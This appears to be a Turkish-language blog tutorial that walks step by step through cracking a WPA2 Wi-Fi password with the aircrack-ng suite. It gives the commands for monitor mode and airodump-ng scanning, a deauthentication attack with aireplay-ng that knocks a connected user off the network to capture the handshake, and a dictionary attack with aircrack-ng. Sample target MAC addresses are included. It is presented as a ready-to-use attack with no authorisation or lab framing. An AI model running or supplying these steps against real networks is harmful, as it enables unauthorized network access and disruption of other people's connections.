WPA2 de parolanın doğrulanması için 4lü el sıkışma gerçekleştirilir.Bu linkteki videoda 4lü el sıkışmanın nasıl gerçekleştirildiği anlatılıyor.İzlemenizde fayda var.
Senaryomuz şu şekilde ilerleyecek:
* Ağ kartımızı monitör mode alıp hedef kablosuz ağı dinleyeceğiz
* Handshake yakalayacağız
* Elde ettiğimiz paket üzerinden sözlük saldırısı gerçekleştireceğiz
(Ben senaryo boyunca TP-LINK TL-WN722n ürününü ve ubuntu 14.04 kullanıyor olacağım)
ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up
Yukarıdaki komutları girerek ağ kartımı monitör moda aldım.Kontrol etmek için “iwconfig” yazıyorum.Bu arada sizin ağ kartınız wlan1 olarak atanmamış olabilir ifconfig yazarak kontrol edebilirsiniz.
Şimdi ise etraftaki kablosuz ağları tarayalım.
airodump-ng wlan1
Daha son hedef ağı dinlemeye alalım.
airodump-ng KABLOSUZ_AG_KARTI --bssid HEDEF_BSSID -c KANALNUMARASI -w DOSYAADI
airodump-ng wlan1 –bssid 00:1C:A8:AB:1E:15 -c 1 -w handshake
Burada kablosuz ağı dinliyoruz ve handshake yakalamak için kablosuz ağ parolasını bilen birinin ağa bağlanmasını bekliyoruz.Eğer beklemek istemiyorsak içeride bağlı olan birini ağdan düşürebiliriz.
Kablosuz ağı dinlerken yeni bir terminal açıyoruz ve içeriden birini düşürmek için hazırlıkları yapıyoruz.Station bölümünün altından ağa bağlı olan kullanıcıların mac adreslerini görüyoruz,burdan bir tanesini seçip atağı başlatıyoruz.
aireplay-ng --deauth 0 -a BSSID -c HEDEF_MAC_ADRESI KABLOSUZ_AG_KARTI
aireplay-ng –deauth 0 -a 00:1C:A8:AB:1E:15 -c 2C:33:7A:FF:08:93 wlan1
Biraz bekledikten sonra atağı durduyoruz ve hedefin tekrar ağa bağlanmasını bekliyoruz.
Görüldüğü gibi handshake i böylelikle yakalamış oluyoruz.
Son olarak yakaladığımız handshake üzerinden sözlük saldırısını gerçekleştirelim.
aircrack-ng -w WORDLIST CAP_DOSYASI
aircrack-ng -w password.txt handshake-01.cap
Eğer wordlistimizin içinde kablosuz ağın parolası var ise “KEY FOUND” diyerek parolayı ekrana basacaktır.
İlk Yorumu Siz Yapın